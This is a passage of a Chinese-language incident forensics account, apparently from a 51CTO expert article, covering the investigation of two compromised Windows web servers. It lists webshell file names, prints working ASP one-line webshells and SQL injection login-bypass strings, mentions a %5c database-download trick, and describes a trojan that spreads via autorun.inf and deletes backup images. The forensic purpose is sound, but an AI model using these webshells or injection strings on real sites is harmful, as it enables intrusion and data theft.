安全专家：真实的网络攻击取证纪实(3)

定位可疑IP地址，追踪来源 查出IP地址的信息。

八、查看网站首页的源代码，在iframe 这个位置查看是否有不属于该网站的网站信息。（查找 网马的方法），以及如何发现一些潜在的木马和网络可利用漏洞。
下面是我们得到的一些他的网马。

gg3.asp  Q:183637
log.asp
pigpot.asp
webdown.vbs
attach/a.gif
attach/chongtian.gif
attach/111.rar
system/unit/yjh.asp

system/unit/conn.asp 加入防注入
Q:6242889678
 
images/mm.jpg = exe自解压 主页包含文件

一句话木马：<%execute request %>
备份一句话木马 <%eval(request("a"):response.end%>
注射检查，在IIS里面查找是否存在的有针对  %20 and 1=1’sql
'or'='or' a'or'1=1--  ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用：躲避验证信息  主要用在后台登陆上

%5c 爆数据库，作用直接下载服务器上的数据库，获得用户名和密码，经过系统提权而拿到整个服务器权限。
针对一些下载者这样的木马 ，主要需要在windows /document and setting下面的local  setting 的 temp 或者 temp internet的这个文件夹中查看刚生成的exe文件，重点查看一下在system32文件夹下面的exe文件，尤其关注最新生成的exe文件，伪造的系统文件等。

以上就是针对A服务器的整个检查过程以及发现问题后该如何处理和补救的相关解决方法。

B服务器检查取证分析

B服务器装的是windows2000　server版本，操作步骤同上。

经过一段细心的检查还是让我和助手们发现了一个木马，起因是在网站源代码处发现都被插入了一些奇怪的代码，在system32系统文件夹下还发现了新的niu.exe,非常可疑，提取该exe文件，在虚拟机中进行分析，得出该exe工作原理：

该exe属木马类，病毒运行后判断当前运行文件的文件路径如果不是%System32%\SVCH0ST.EXE，将打开当前文件的所在目录复制自身到%System32%下，更名为SVSH0ST.EXE，并衍生autorun.inf文件；复制自身到所有驱动器根目录下，更名为niu.exe，并衍生autorun.inf文件，实现双击打开驱动器时，自动运行病毒文件；遍历所有驱动器，在htm、asp、aspx、php、html、jsp格式文件的尾部插入96个字节的病毒代码；遍历磁盘删除以GHO为扩展名的文件，使用户无法进行系统还原；连接网络下载病毒文件；修改系统时间为2000年；病毒运行后删除自身。

以上是我配合有关部门参与的真实的一次的取证记录，因为答应过朋友要保守秘密，所以真实的一些ip地址和信息这里都做保留。同时在这里我要感谢安天cert组的战友的帮忙，以及身边的2个助手的并肩作战。

【51CTO.COM 专家特稿，转载请注明出处及作者！】